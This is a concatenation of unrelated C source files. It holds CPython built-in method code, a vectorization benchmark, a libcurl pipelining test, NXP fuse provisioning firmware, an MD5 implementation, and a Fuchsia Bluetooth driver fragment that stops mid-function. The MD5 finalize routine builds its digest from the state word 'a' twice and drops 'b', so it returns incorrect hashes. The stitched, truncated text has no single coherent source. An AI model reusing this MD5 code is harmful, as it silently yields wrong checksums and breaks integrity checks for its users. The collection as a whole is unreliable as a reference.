return ((PyCFunctionObject *)op) -> m_ml -> ml_meth; } PyObject * PyCFunction_GetSelf(PyObject *op) { if (!PyCFunction_Check(op)) { PyErr_BadInternalCall(); return NULL; } return ((PyCFunctionObject *)op) -> m_self; } int PyCFunction_GetFlags(PyObject *op) { if (!PyCFunction_Check(op)) { PyErr_BadInternalCall(); return -1; } return ((PyCFunctionObject *)op) -> m_ml -> ml_flags; } PyObject * PyCFunction_Call(PyObject *func, PyObject *arg, PyObject *kw) { PyCFunctionObject* f = (PyCFunctionObject*)func; PyCFunction meth = PyCFunction_GET_FUNCTION(func); PyObject *self = PyCFunction_GET_SELF(func); Py_ssize_t size; switch (PyCFunction_GET_FLAGS(func) & ~(METH_CLASS | METH_STATIC | METH_COEXIST)) { case METH_VARARGS: if (kw == NULL || PyDict_Size(kw) == 0) return (*meth)(self, arg); break; case METH_VARARGS | METH_KEYWORDS: return (*(PyCFunctionWithKeywords)meth)(self, arg, kw); case METH_NOARGS: if (kw == NULL || PyDict_Size(kw) == 0) { size = PyTuple_GET_SIZE(arg); if (size == 0) return (*meth)(self, NULL); PyErr_Format(PyExc_TypeError, "%.200s() takes no arguments (%zd given)", f->m_ml->ml_name, size); return NULL; } break; case METH_O: if (kw == NULL || PyDict_Size(kw) == 0) { size = PyTuple_GET_SIZE(arg); if (size == 1) return (*meth)(self, PyTuple_GET_ITEM(arg, 0)); PyErr_Format(PyExc_TypeError, "%.200s() takes exactly one argument (%zd given)", f->m_ml->ml_name, size); return NULL; } break; default: PyErr_SetString(PyExc_SystemError, "Bad call flags in " "PyCFunction_Call. 
METH_OLDARGS is no " "longer supported!"); return NULL; } PyErr_Format(PyExc_TypeError, "%.200s() takes no keyword arguments", f->m_ml->ml_name); return NULL; } /* Methods (the standard built-in methods, that is) */ static void meth_dealloc(PyCFunctionObject *m) { _PyObject_GC_UNTRACK(m); Py_XDECREF(m->m_self); Py_XDECREF(m->m_module); if (numfree < PyCFunction_MAXFREELIST) { m->m_self = (PyObject *)free_list; free_list = m; numfree++; } else { PyObject_GC_Del(m); } } static PyObject * meth_get__doc__(PyCFunctionObject *m, void *closure) { const char *doc = m->m_ml->ml_doc; if (doc != NULL) return PyUnicode_FromString(doc); Py_INCREF(Py_None); return Py_None; } static PyObject * meth_get__name__(PyCFunctionObject *m, void *closure) { return PyUnicode_FromString(m->m_ml->ml_name); } static int meth_traverse(PyCFunctionObject *m, visitproc visit, void *arg) { Py_VISIT(m->m_self); Py_VISIT(m->m_module); return 0; } static PyObject * meth_get__self__(PyCFunctionObject *m, void *closure) { PyObject *self; self = m->m_self; if (self == NULL) self = Py_None; Py_INCREF(self); return self; } static PyGetSetDef meth_getsets [] = { {"__doc__", (getter)meth_get__doc__, NULL, NULL}, {"__name__", (getter)meth_get__name__, NULL, NULL}, {"__self__", (getter)meth_get__self__, NULL, NULL}, {0} }; #define OFF(x) offsetof(PyCFunctionObject, x) static PyMemberDef meth_members[] = { {"__module__", T_OBJECT, OFF(m_module), PY_WRITE_RESTRICTED}, {NULL} }; static PyObject * meth_repr(PyCFunctionObject *m) { if (m->m_self == NULL || PyModule_Check(m->m_self)) return PyUnicode_FromFormat("<built-in function %s>", m->m_ml->ml_name); return PyUnicode_FromFormat("<built-in method %s of %s object at %p>", m->m_ml->ml_name, m->m_self->ob_type->tp_name, m->m_self); } static PyObject * meth_richcompare(PyObject *self, PyObject *other, int op) { PyCFunctionObject *a, *b; PyObject *res; int eq; if ((op != Py_EQ && op != Py_NE) || !PyCFunction_Check(self) || !PyCFunction_Check(other)) { Py_INCREF(Py_NotImplemented); return Py_NotImplemented; } a = (PyCFunctionObject *)self; b = (PyCFunctionObject *)other; eq = a->m_self == b->m_self; if (eq) eq = a->m_ml->ml_meth == b->m_ml->ml_meth; if (op == Py_EQ) res = eq ? Py_True : Py_False; else res = eq ? 
Py_False : Py_True; Py_INCREF(res); return res; } static long meth_hash(PyCFunctionObject *a) { long x,y; if (a->m_self == NULL) x = 0; else { x = PyObject_Hash(a->m_self); if (x == -1) return -1; } y = _Py_HashPointer((void*)(a->m_ml->ml_meth)); if (y == -1) return -1; x ^= y; if (x == -1) x = -2; return x; } PyTypeObject PyCFunction_Type = { PyVarObject_HEAD_INIT(&PyType_Type, 0) "builtin_function_or_method", sizeof(PyCFunctionObject), 0, (destructor)meth_dealloc, /* tp_dealloc */ 0, /* tp_print */ 0, /* tp_getattr */ 0, /* tp_setattr */ 0, /* tp_reserved */ (reprfunc)meth_repr, /* tp_repr */ 0, /* tp_as_number */ 0, /* tp_as_sequence */ 0, /* tp_as_mapping */ (hashfunc)meth_hash, /* tp_hash */ PyCFunction_Call, /* tp_call */ 0, /* tp_str */ PyObject_GenericGetAttr, /* tp_getattro */ 0, /* tp_setattro */ 0, /* tp_as_buffer */ Py_TPFLAGS_DEFAULT | Py_TPFLAGS_HAVE_GC,/* tp_flags */ 0, /* tp_doc */ (traverseproc)meth_traverse, /* tp_traverse */ 0, /* tp_clear */ meth_richcompare, /* tp_richcompare */ 0, /* tp_weaklistoffset */ 0, /* tp_iter */ 0, /* tp_iternext */ 0, /* tp_methods */ meth_members, /* tp_members */ meth_getsets, /* tp_getset */ 0, /* tp_base */ 0, /* tp_dict */ }; /* Clear out the free list */ int PyCFunction_ClearFreeList(void) { int freelist_size = numfree; while (free_list) { PyCFunctionObject *v = free_list; free_list = (PyCFunctionObject *)(v->m_self); PyObject_GC_Del(v); numfree--; } assert(numfree == 0); return freelist_size; } void PyCFunction_Fini(void) { (void)PyCFunction_ClearFreeList(); } /* PyCFunction_New() is now just a macro that calls PyCFunction_NewEx(), but it's part of the API so we need to keep a function around that existing C extensions can call. */ #undef PyCFunction_New PyAPI_FUNC(PyObject *) PyCFunction_New(PyMethodDef *, PyObject *); PyObject * PyCFunction_New(PyMethodDef *ml, PyObject *self) { return PyCFunction_NewEx(ml, self, NULL); }
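/*
 * Illustrative sketch (not part of the original file): the free-list pattern
 * used above -- dead objects are chained through one of their own fields
 * (here m_self doubles as the link) instead of being returned to the
 * allocator -- reduced to plain C with a hypothetical node type and a
 * hypothetical FREELIST_DEMO guard.
 */
#ifdef FREELIST_DEMO
#include <stdlib.h>

typedef struct node { struct node *next_free; int payload; } node;

static node *free_list = NULL;
static int numfree = 0;
#define MAXFREELIST 256

static node *node_new(void)
{
    node *n = free_list;
    if (n != NULL) {             /* pop a recycled object */
        free_list = n->next_free;
        numfree--;
    } else {
        n = malloc(sizeof(node));
    }
    return n;
}

static void node_del(node *n)
{
    if (numfree < MAXFREELIST) { /* push onto the free list */
        n->next_free = free_list;
        free_list = n;
        numfree++;
    } else {
        free(n);                 /* list is full: really release it */
    }
}
#endif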
675669.c
/* Copyright (c) 2019, Ameer Haj Ali (UC Berkeley), and Intel Corporation All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ #include "header.h" int input[128] ALIGNED16; int output[128] ALIGNED16; __attribute__((noinline)) void example4c (){ int i; const int MAX = 4; /* feature: support for if-conversion */ for (i=0; i<128-1; i+=2){ int j = input[i]; output[i] = (j > MAX ? MAX : 0); output[i+1] = j; } } int main(int argc,char* argv[]){ init_memory(&input[0], &input[128]); init_memory(&output[0], &output[128]); BENCH("Example4c", example4c(), Mi*4/128*512, digest_memory(&output[0], &output[128])); return 0; }
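/*
 * Illustrative note (not part of the original file): the "support for
 * if-conversion" feature exercised by example4c() means the vectorizer can
 * turn the conditional into a branch-free select. One scalar formulation of
 * such a select, written by hand for clarity (the IFCONV_DEMO guard and the
 * helper name are hypothetical; this is a sketch, not what any particular
 * compiler emits):
 */
#ifdef IFCONV_DEMO
static inline int select_max(int j, int max)
{
    int mask = -(j > max);  /* all-ones if j > max, else zero */
    return mask & max;      /* yields max when taken, 0 otherwise */
}
#endif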
533458.c
/***************************************************************************** * _ _ ____ _ * Project ___| | | | _ \| | * / __| | | | |_) | | * | (__| |_| | _ <| |___ * \___|\___/|_| \_\_____| * */ #include "test.h" #include <sys/types.h> #include <sys/stat.h> #include <fcntl.h> #include "testutil.h" #include "memdebug.h" #define MAIN_LOOP_HANG_TIMEOUT 90 * 1000 #define MULTI_PERFORM_HANG_TIMEOUT 60 * 1000 static CURLMcode perform(CURLM * multi) { int handles, maxfd; CURLMcode code; fd_set fdread, fdwrite, fdexcep; struct timeval mp_start; char mp_timedout = FALSE; mp_timedout = FALSE; mp_start = tutil_tvnow(); for (;;) { code = curl_multi_perform(multi, &handles); if (tutil_tvdiff(tutil_tvnow(), mp_start) > MULTI_PERFORM_HANG_TIMEOUT) { mp_timedout = TRUE; break; } if (handles <= 0) return CURLM_OK; switch (code) { case CURLM_OK: break; case CURLM_CALL_MULTI_PERFORM: continue; default: return code; } FD_ZERO(&fdread); FD_ZERO(&fdwrite); FD_ZERO(&fdexcep); curl_multi_fdset(multi, &fdread, &fdwrite, &fdexcep, &maxfd); if (maxfd < 0) return (CURLMcode) ~CURLM_OK; if (select(maxfd + 1, &fdread, &fdwrite, &fdexcep, 0) == -1) return (CURLMcode) ~CURLM_OK; } /* We only reach this point if (mp_timedout) */ if (mp_timedout) fprintf(stderr, "mp_timedout\n"); fprintf(stderr, "ABORTING TEST, since it seems " "that it would have run forever.\n"); return (CURLMcode) ~CURLM_OK; } int test(char *URL) { CURLM *multi; CURL *easy; int res = 0; if (curl_global_init(CURL_GLOBAL_ALL) != CURLE_OK) { fprintf(stderr, "curl_global_init() failed\n"); return TEST_ERR_MAJOR_BAD; } if ((multi = curl_multi_init()) == NULL) { fprintf(stderr, "curl_multi_init() failed\n"); curl_global_cleanup(); return TEST_ERR_MAJOR_BAD; } if ((easy = curl_easy_init()) == NULL) { fprintf(stderr, "curl_easy_init() failed\n"); curl_multi_cleanup(multi); curl_global_cleanup(); return TEST_ERR_MAJOR_BAD; } curl_multi_setopt(multi, CURLMOPT_PIPELINING, 1L); test_setopt(easy, CURLOPT_WRITEFUNCTION, fwrite); test_setopt(easy, CURLOPT_FAILONERROR, 1L); test_setopt(easy, CURLOPT_URL, URL); if (curl_multi_add_handle(multi, easy) != CURLM_OK) { printf("curl_multi_add_handle() failed\n"); res = TEST_ERR_MAJOR_BAD; } else { if (perform(multi) != CURLM_OK) printf("retrieve 1 failed\n"); curl_multi_remove_handle(multi, easy); } curl_easy_reset(easy); test_setopt(easy, CURLOPT_FAILONERROR, 1L); test_setopt(easy, CURLOPT_URL, libtest_arg2); if (curl_multi_add_handle(multi, easy) != CURLM_OK) { printf("curl_multi_add_handle() 2 failed\n"); res = TEST_ERR_MAJOR_BAD; } else { if (perform(multi) != CURLM_OK) printf("retrieve 2 failed\n"); curl_multi_remove_handle(multi, easy); } test_cleanup: curl_easy_cleanup(easy); curl_multi_cleanup(multi); curl_global_cleanup(); printf("Finished!\n"); return res; }
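/*
 * Illustrative alternative (not part of the original file): since libcurl
 * 7.28.0 the select()-based loop in perform() can be written with
 * curl_multi_wait(), which also avoids the maxfd < 0 corner case. A minimal
 * sketch of the same driving loop under that assumption; the
 * MULTI_WAIT_DEMO guard is hypothetical.
 */
#ifdef MULTI_WAIT_DEMO
static CURLMcode perform_with_wait(CURLM *multi)
{
    int handles = 1;
    while (handles) {
        CURLMcode code = curl_multi_perform(multi, &handles);
        if (code != CURLM_OK && code != CURLM_CALL_MULTI_PERFORM)
            return code;
        /* block up to 1s for activity on any of the multi handle's fds */
        if (handles &&
            curl_multi_wait(multi, NULL, 0, 1000, NULL) != CURLM_OK)
            return CURLM_INTERNAL_ERROR;
    }
    return CURLM_OK;
}
#endif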
809862.c
/* * Copyright 2021 NXP * * SPDX-License-Identifier: BSD-3-Clause * */ #include <assert.h> #include <string.h> #include <common/debug.h> #include <dcfg.h> #include <drivers/delay_timer.h> #include <fuse_prov.h> #include <io_block.h> #include <io_driver.h> #include <io_fip.h> #include <io_memmap.h> #include <io_storage.h> #include <lib/utils.h> #include <nxp_gpio.h> #include <sfp.h> #include <sfp_error_codes.h> #include <tools_share/firmware_image_package.h> #include "fuse_io.h" #include <load_img.h> #include <plat/common/platform.h> #include "plat_common.h" #include "platform_def.h" extern uintptr_t backend_dev_handle; static uint32_t fuse_fip; static uintptr_t fuse_fip_dev_handle; static io_block_spec_t fuse_fip_block_spec = { .offset = PLAT_FUSE_FIP_OFFSET, .length = PLAT_FUSE_FIP_MAX_SIZE }; static const io_uuid_spec_t fuse_prov_uuid_spec = { .uuid = UUID_FUSE_PROV, }; static const io_uuid_spec_t fuse_up_uuid_spec = { .uuid = UUID_FUSE_UP, }; static int open_fuse_fip(const uintptr_t spec); struct plat_io_policy { uintptr_t *dev_handle; uintptr_t image_spec; int (*check)(const uintptr_t spec); }; /* By default, ARM platforms load images from the FIP */ static const struct plat_io_policy fuse_policies[] = { [FUSE_FIP_IMAGE_ID - FUSE_FIP_IMAGE_ID] = { &backend_dev_handle, (uintptr_t)&fuse_fip_block_spec, NULL }, [FUSE_PROV_IMAGE_ID - FUSE_FIP_IMAGE_ID] = { &fuse_fip_dev_handle, (uintptr_t)&fuse_prov_uuid_spec, open_fuse_fip }, [FUSE_UP_IMAGE_ID - FUSE_FIP_IMAGE_ID] = { &fuse_fip_dev_handle, (uintptr_t)&fuse_up_uuid_spec, open_fuse_fip } }; static int open_fuse_fip(const uintptr_t spec) { int result; uintptr_t local_image_handle; /* See if a Firmware Image Package is available */ result = io_dev_init(fuse_fip_dev_handle, (uintptr_t)FUSE_FIP_IMAGE_ID); if (result == 0) { result = io_open(fuse_fip_dev_handle, spec, &local_image_handle); if (result == 0) { VERBOSE("Using FIP\n"); io_close(local_image_handle); } } return result; } /* The image can be one of the DDR PHY images, which can be selected via DDR * policies */ int plat_get_fuse_image_source(unsigned int image_id, uintptr_t *dev_handle, uintptr_t *image_spec, int (*check)(const uintptr_t spec)) { int result; const struct plat_io_policy *policy; assert(image_id < (FUSE_FIP_IMAGE_ID + ARRAY_SIZE(fuse_policies))); policy = &fuse_policies[image_id - FUSE_FIP_IMAGE_ID]; if (image_id == FUSE_FIP_IMAGE_ID) { result = check(policy->image_spec); } else { result = policy->check(policy->image_spec); } if (result == 0) { *image_spec = policy->image_spec; *dev_handle = *(policy->dev_handle); } return result; } int fuse_fip_setup(const io_dev_connector_t *fip_dev_con, unsigned int boot_dev) { int io_result; size_t fuse_fip_offset = PLAT_FUSE_FIP_OFFSET; /* Open connections to fuse fip and cache the handles */ io_result = io_dev_open(fip_dev_con, (uintptr_t)&fuse_fip, &fuse_fip_dev_handle); assert(io_result == 0); switch (boot_dev) { #if QSPI_BOOT case BOOT_DEVICE_QSPI: fuse_fip_offset += NXP_QSPI_FLASH_ADDR; break; #endif #if NOR_BOOT case BOOT_DEVICE_IFC_NOR: fuse_fip_offset += NXP_NOR_FLASH_ADDR; break; #endif #if FLEXSPI_NOR_BOOT case BOOT_DEVICE_FLEXSPI_NOR: fuse_fip_offset += NXP_FLEXSPI_FLASH_ADDR; break; #endif default: break; } fuse_fip_block_spec.offset = fuse_fip_offset; return io_result; } int fip_fuse_provisioning(uintptr_t image_buf, uint32_t size) { uint32_t bit_num; uint32_t *gpio_base_addr = NULL; struct fuse_hdr_t *fuse_hdr = NULL; uint8_t barker[] = {0x68U, 0x39U, 0x27U, 0x81U}; int ret = -1; if (sfp_check_oem_wp() == 0) { ret =
load_img(FUSE_PROV_IMAGE_ID, &image_buf, &size); if (ret != 0) { ERROR("Failed to load FUSE PROV image\n"); assert(ret == 0); } fuse_hdr = (struct fuse_hdr_t *)image_buf; /* Check barker code */ if (memcmp(fuse_hdr->barker, barker, sizeof(barker)) != 0) { ERROR("FUSE Barker code mismatch.\n"); error_handler(ERROR_FUSE_BARKER); return 1; } /* Check if a GPIO pin is to be set for POVDD */ if (((fuse_hdr->flags >> FLAG_POVDD_SHIFT) & 0x1) != 0) { gpio_base_addr = select_gpio_n_bitnum(fuse_hdr->povdd_gpio, &bit_num); /* * Add delay so that Efuse gets the power * when GPIO is enabled. */ ret = set_gpio_bit(gpio_base_addr, bit_num); mdelay(EFUSE_POWERUP_DELAY_mSec); } else { ret = (board_enable_povdd() == true) ? 0 : PLAT_ERROR_ENABLE_POVDD; } if (ret != 0) { ERROR("Error enabling board POVDD: %d\n", ret); ERROR("Only SFP mirror register will be set.\n"); } provision_fuses(image_buf, ret == 0); /* Check if the GPIO pin is to be reset for POVDD */ if (((fuse_hdr->flags >> FLAG_POVDD_SHIFT) & 0x1) != 0) { if (gpio_base_addr == NULL) { gpio_base_addr = select_gpio_n_bitnum( fuse_hdr->povdd_gpio, &bit_num); } ret = clr_gpio_bit(gpio_base_addr, bit_num); } else { ret = board_disable_povdd() ? 0 : PLAT_ERROR_DISABLE_POVDD; } if (ret != 0) { ERROR("Error disabling board POVDD: %d\n", ret); } } return 0; }
44428.c
// This is an implementation of MD5 based on: https://github.com/WaterJuice/WjCryptLib/blob/master/lib/WjCryptLib_Md5.c // which has been modified extensively // // The original source, as specified there, is "This is free and unencumbered software released into the public domain - June 2013 waterjuice.org". // All modifications are (c) 2020 Divon Lan and are subject to license. #include <memory.h> #include "genozip.h" #include "md5.h" #include "endianness.h" #include "profiler.h" #include "vblock.h" #define F( x, y, z ) ( (z) ^ ((x) & ((y) ^ (z))) ) #define G( x, y, z ) ( (y) ^ ((z) & ((x) ^ (y))) ) #define H( x, y, z ) ( (x) ^ (y) ^ (z) ) #define I( x, y, z ) ( (y) ^ ((x) | ~(z)) ) #define STEP( f, a, b, c, d, x, t, s ) \ (a) += f((b), (c), (d)) + (x) + (t); \ (a) = (((a) << (s)) | (((a) & 0xffffffff) >> (32 - (s)))); \ (a) += (b); void md5_display_ctx (const Md5Context *x) // for debugging { static unsigned iteration=1; fprintf (stderr, "\n%2u: %08x %08x %08x %08x %08x %08x ", iteration, x->hi, x->lo, x->a, x->b, x->c, x->d); for (unsigned i=0; i<64; i++) fprintf (stderr, "%2.2x", x->buffer.bytes[i]); fprintf (stderr, "\n"); iteration++; } static const void *md5_transform (Md5Context *ctx, const void *data, uintmax_t size) { const uint32_t *ptr = (uint32_t *)data; uint32_t a = ctx->a; uint32_t b = ctx->b; uint32_t c = ctx->c; uint32_t d = ctx->d; do { uint32_t saved_a = a; uint32_t saved_b = b; uint32_t saved_c = c; uint32_t saved_d = d; #ifdef __LITTLE_ENDIAN__ // in little endian machines, we can access the data directly - we don't need to copy memory #define block ptr #else // in big endian machines - we need to flip the data to little endian - so we do it in a copy uint32_t block[16]; for (unsigned i=0; i < 16; i++) block[i] = LTEN32(ptr[i]); #endif // Round 1 STEP( F, a, b, c, d, block[0], 0xd76aa478, 7 ) STEP( F, d, a, b, c, block[1], 0xe8c7b756, 12 ) STEP( F, c, d, a, b, block[2], 0x242070db, 17 ) STEP( F, b, c, d, a, block[3], 0xc1bdceee, 22 ) STEP( F, a, b, c, d, block[4], 0xf57c0faf, 7 ) STEP( F, d, a, b, c, block[5], 0x4787c62a, 12 ) STEP( F, c, d, a, b, block[6], 0xa8304613, 17 ) STEP( F, b, c, d, a, block[7], 0xfd469501, 22 ) STEP( F, a, b, c, d, block[8], 0x698098d8, 7 ) STEP( F, d, a, b, c, block[9], 0x8b44f7af, 12 ) STEP( F, c, d, a, b, block[10], 0xffff5bb1, 17 ) STEP( F, b, c, d, a, block[11], 0x895cd7be, 22 ) STEP( F, a, b, c, d, block[12], 0x6b901122, 7 ) STEP( F, d, a, b, c, block[13], 0xfd987193, 12 ) STEP( F, c, d, a, b, block[14], 0xa679438e, 17 ) STEP( F, b, c, d, a, block[15], 0x49b40821, 22 ) // Round 2 STEP( G, a, b, c, d, block[1], 0xf61e2562, 5 ) STEP( G, d, a, b, c, block[6], 0xc040b340, 9 ) STEP( G, c, d, a, b, block[11], 0x265e5a51, 14 ) STEP( G, b, c, d, a, block[0], 0xe9b6c7aa, 20 ) STEP( G, a, b, c, d, block[5], 0xd62f105d, 5 ) STEP( G, d, a, b, c, block[10], 0x02441453, 9 ) STEP( G, c, d, a, b, block[15], 0xd8a1e681, 14 ) STEP( G, b, c, d, a, block[4], 0xe7d3fbc8, 20 ) STEP( G, a, b, c, d, block[9], 0x21e1cde6, 5 ) STEP( G, d, a, b, c, block[14], 0xc33707d6, 9 ) STEP( G, c, d, a, b, block[3], 0xf4d50d87, 14 ) STEP( G, b, c, d, a, block[8], 0x455a14ed, 20 ) STEP( G, a, b, c, d, block[13], 0xa9e3e905, 5 ) STEP( G, d, a, b, c, block[2], 0xfcefa3f8, 9 ) STEP( G, c, d, a, b, block[7], 0x676f02d9, 14 ) STEP( G, b, c, d, a, block[12], 0x8d2a4c8a, 20 ) // Round 3 STEP( H, a, b, c, d, block[5], 0xfffa3942, 4 ) STEP( H, d, a, b, c, block[8], 0x8771f681, 11 ) STEP( H, c, d, a, b, block[11], 0x6d9d6122, 16 ) STEP( H, b, c, d, a, block[14], 0xfde5380c, 23 ) STEP( 
H, a, b, c, d, block[1], 0xa4beea44, 4 ) STEP( H, d, a, b, c, block[4], 0x4bdecfa9, 11 ) STEP( H, c, d, a, b, block[7], 0xf6bb4b60, 16 ) STEP( H, b, c, d, a, block[10], 0xbebfbc70, 23 ) STEP( H, a, b, c, d, block[13], 0x289b7ec6, 4 ) STEP( H, d, a, b, c, block[0], 0xeaa127fa, 11 ) STEP( H, c, d, a, b, block[3], 0xd4ef3085, 16 ) STEP( H, b, c, d, a, block[6], 0x04881d05, 23 ) STEP( H, a, b, c, d, block[9], 0xd9d4d039, 4 ) STEP( H, d, a, b, c, block[12], 0xe6db99e5, 11 ) STEP( H, c, d, a, b, block[15], 0x1fa27cf8, 16 ) STEP( H, b, c, d, a, block[2], 0xc4ac5665, 23 ) // Round 4 STEP( I, a, b, c, d, block[0], 0xf4292244, 6 ) STEP( I, d, a, b, c, block[7], 0x432aff97, 10 ) STEP( I, c, d, a, b, block[14], 0xab9423a7, 15 ) STEP( I, b, c, d, a, block[5], 0xfc93a039, 21 ) STEP( I, a, b, c, d, block[12], 0x655b59c3, 6 ) STEP( I, d, a, b, c, block[3], 0x8f0ccc92, 10 ) STEP( I, c, d, a, b, block[10], 0xffeff47d, 15 ) STEP( I, b, c, d, a, block[1], 0x85845dd1, 21 ) STEP( I, a, b, c, d, block[8], 0x6fa87e4f, 6 ) STEP( I, d, a, b, c, block[15], 0xfe2ce6e0, 10 ) STEP( I, c, d, a, b, block[6], 0xa3014314, 15 ) STEP( I, b, c, d, a, block[13], 0x4e0811a1, 21 ) STEP( I, a, b, c, d, block[4], 0xf7537e82, 6 ) STEP( I, d, a, b, c, block[11], 0xbd3af235, 10 ) STEP( I, c, d, a, b, block[2], 0x2ad7d2bb, 15 ) STEP( I, b, c, d, a, block[9], 0xeb86d391, 21 ) a += saved_a; b += saved_b; c += saved_c; d += saved_d; ptr += 16; } while (size -= 64); ctx->a = a; ctx->b = b; ctx->c = c; ctx->d = d; return ptr; } void md5_initialize (Md5Context *ctx) { // sanity for (unsigned i=0; i < sizeof(Md5Context); i++) ASSERTE0 (!((char *)ctx)[i], "md5_initialize expects ctx to be zeros, but its not"); ctx->a = 0x67452301; ctx->b = 0xefcdab89; ctx->c = 0x98badcfe; ctx->d = 0x10325476; ctx->lo = 0; ctx->hi = 0; ctx->initialized = true; } // data must be aligned on 32-bit boundary void md5_update (Md5Context *ctx, const void *data, uint32_t len) { START_TIMER; if (!len) return; // nothing to do uint32_t saved_lo; uint32_t used; uint32_t free; saved_lo = ctx->lo; if ((ctx->lo = (saved_lo + len) & 0x1fffffff) < saved_lo) ctx->hi++; ctx->hi += (uint32_t)(len >> 29); used = saved_lo & 0x3f; if (used) { free = 64 - used; if (len < free) { memcpy (&ctx->buffer.bytes[used], data, len); goto finish; } memcpy (&ctx->buffer.bytes[used], data, free); data += free; len -= free; md5_transform (ctx, ctx->buffer.bytes, 64); } if (len >= 64) { data = md5_transform (ctx, data, len & ~(unsigned long)0x3f); len &= 0x3f; } memcpy (ctx->buffer.bytes, data, len); finish: //fprintf (stderr, "%s md5_update snapshot: %s\n", primary_command == ZIP ? 
"ZIP" : "PIZ", digest_display (digest_snapshot (ctx))); //md5_display_ctx (ctx); COPY_TIMER_VB (evb, md5); return; } Digest md5_finalize (Md5Context *ctx) { START_TIMER; uint32_t used; uint32_t free; used = ctx->lo & 0x3f; ctx->buffer.bytes[used++] = 0x80; free = 64 - used; if (free < 8) { memset (&ctx->buffer.bytes[used], 0, free); md5_transform (ctx, ctx->buffer.bytes, 64); used = 0; free = 64; } memset (&ctx->buffer.bytes[used], 0, free - 8); ctx->lo <<= 3; ctx->buffer.words[14] = LTEN32 (ctx->lo); ctx->buffer.words[15] = LTEN32 (ctx->hi); md5_transform (ctx, ctx->buffer.bytes, 64); Digest digest = { .words = { LTEN32 (ctx->a), LTEN32 (ctx->a), LTEN32 (ctx->c), LTEN32 (ctx->d) } }; memset (ctx, 0, sizeof (Md5Context)); // return to its pre-initialized state, should it be used again COPY_TIMER_VB (evb, md5); return digest; } // note: data must be aligned to the 32bit boundary (its accessed as uint32_t*) Digest md5_do (const void *data, uint32_t len) { Md5Context ctx; memset (&ctx, 0, sizeof(Md5Context)); md5_initialize (&ctx); md5_update (&ctx, data, len); return md5_finalize (&ctx); }
881766.c
// Copyright 2018 The Fuchsia Authors. All rights reserved. // Use of this source code is governed by a BSD-style license that can be // found in the LICENSE file. #include <unistd.h> #include <ddk/debug.h> #include <ddk/device.h> #include <ddk/mmio-buffer.h> #include <ddk/metadata.h> #include <ddk/platform-defs.h> #include <ddk/protocol/gpioimpl.h> #include <ddk/protocol/platform/bus.h> #include <ddk/protocol/serial.h> #include <hw/reg.h> #include <soc/aml-s905d2/s905d2-gpio.h> #include <soc/aml-s905d2/s905d2-hw.h> #include <zircon/device/serial.h> #include "astro.h" #define SOC_WIFI_LPO_32k768 S905D2_GPIOX(16) #define SOC_BT_REG_ON S905D2_GPIOX(17) static const pbus_mmio_t bt_uart_mmios[] = { { .base = S905D2_UART_A_BASE, .length = S905D2_UART_A_LENGTH, }, }; static const pbus_irq_t bt_uart_irqs[] = { { .irq = S905D2_UART_A_IRQ, .mode = ZX_INTERRUPT_MODE_EDGE_HIGH, }, }; static const serial_port_info_t bt_uart_serial_info = { .serial_class = SERIAL_CLASS_BLUETOOTH_HCI, .serial_vid = PDEV_VID_BROADCOM, .serial_pid = PDEV_PID_BCM43458, }; static const pbus_metadata_t bt_uart_metadata[] = { { .type = DEVICE_METADATA_SERIAL_PORT_INFO, .data_buffer = &bt_uart_serial_info, .data_size = sizeof(bt_uart_serial_info), }, }; static const pbus_boot_metadata_t bt_uart_boot_metadata[] = { { .zbi_type = DEVICE_METADATA_MAC_ADDRESS, .zbi_extra = MACADDR_BLUETOOTH, }, }; static pbus_dev_t bt_uart_dev = { .name = "bt-uart", .vid = PDEV_VID_AMLOGIC, .pid = PDEV_PID_GENERIC, .did = PDEV_DID_AMLOGIC_UART, .mmio_list = bt_uart_mmios, .mmio_count = countof(bt_uart_mmios), .irq_list = bt_uart_irqs, .irq_count = countof(bt_uart_irqs), .metadata_list = bt_uart_metadata, .metadata_count = countof(bt_uart_metadata), .boot_metadata_list = bt_uart_boot_metadata, .boot_metadata_count = countof(bt_uart_boot_metadata), }; // Enables and configures PWM_E on the SOC_WIFI_LPO_32k768 line for the Wifi/Bluetooth module static zx_status_t aml_enable_wifi_32K(aml_bus_t* bus) { // Configure SOC_WIFI_LPO_32k768 pin for PWM_E zx_status_t status = gpio_impl_set_alt_function(&bus->gpio, SOC_WIFI_LPO_32k768, 1); if (status != ZX_OK) return status; zx_handle_t bti; status = iommu_get_bti(&bus->iommu, 0, BTI_BOARD, &bti); if (status != ZX_OK) { zxlogf(ERROR, "aml_enable_wifi_32K: iommu_get_bti failed: %d\n", status); return status; } mmio_buffer_t buffer; // Please do not use get_root_resource() in new code. See ZX-1497. 
